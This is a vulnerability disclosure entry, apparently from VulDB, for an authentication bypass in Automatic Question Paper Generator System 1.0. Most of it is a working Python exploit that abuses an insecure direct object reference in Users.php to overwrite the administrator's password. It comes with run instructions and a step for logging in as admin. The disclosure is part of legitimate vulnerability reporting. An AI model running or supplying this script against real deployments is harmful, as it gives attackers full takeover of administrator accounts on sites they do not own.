Submit #31977: Automatic Question Paper Generator System 1.0 - Authentication Bypassinfo

TitleAutomatic Question Paper Generator System 1.0 - Authentication Bypass
DescriptionThe Automatic Question Paper Generator (AQPG) in version 1.0 is vulnerable to bypassing authentication by changing the administrator password by insecure direct object reference (IDOR) attack, for this reason, the attacker can have full access to the administrator account by resetting your password. * Steps to Reproduce: 1. Create a python file and paste this code and save: ####################################################### import requests import random import string from requests_toolbelt import MultipartEncoder from time import sleep import argparse def banner(): print(''' ___ ____ ____ ______ / | / __ \ / __ \/ ____/ / /| |/ / / / / /_/ / / __ / ___ / /_/ / / ____/ /_/ / /_/ |_\___\_\/_/ \____/ [Automatic Question Paper Generator v1.0] [Authentication Bypass] ''') def main(): fields = { 'id': "1", 'firstname': 'Adminstrator', 'lastname': 'Admin', 'username': 'admin', 'password': arguments.newpassword } boundary = '----WebKitFormBoundary' + ''.join(random.sample(string.ascii_letters + string.digits, 16)) m = MultipartEncoder(fields=fields, boundary=boundary) headers = { "Connection": "keep-alive", "Content-Type": m.content_type } r = requests.post(f'{arguments.url}/classes/Users.php?f=save', headers=headers, data=m) if '1' in r.text: print(f'[+] Account taken successfully! Login: admin:{arguments.newpassword}') else: print('[-] Not vulnerable') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-u','--url', action='store', help='Target URL (http://target.com/aqpg/)', dest='url', required=True) parser.add_argument('-p','--password', action='store', help='New password', dest='newpassword', required=True) arguments = parser.parse_args() banner() sleep(2) main() ####################################################### 2. Run the command: python3 exploit.py -u http://target.com/aqpg/ -p newpassword 3. Now open your browser and go to the admin login page (http://target.com/aqpg/admin/login.php) and login using the admin:newpassword credentials. You will be logged into the administrator account.
Source⚠️ https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html
User
 mrempy (UID 24379)
Submission03/05/2022 18:13 (4 years ago)
Moderation03/13/2022 12:12 (8 days later)
StatusAccepted
VulDB entry194839 [Automatic Question Paper Generator 1.0 password recovery]
Points20

PreviousOverviewNext

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!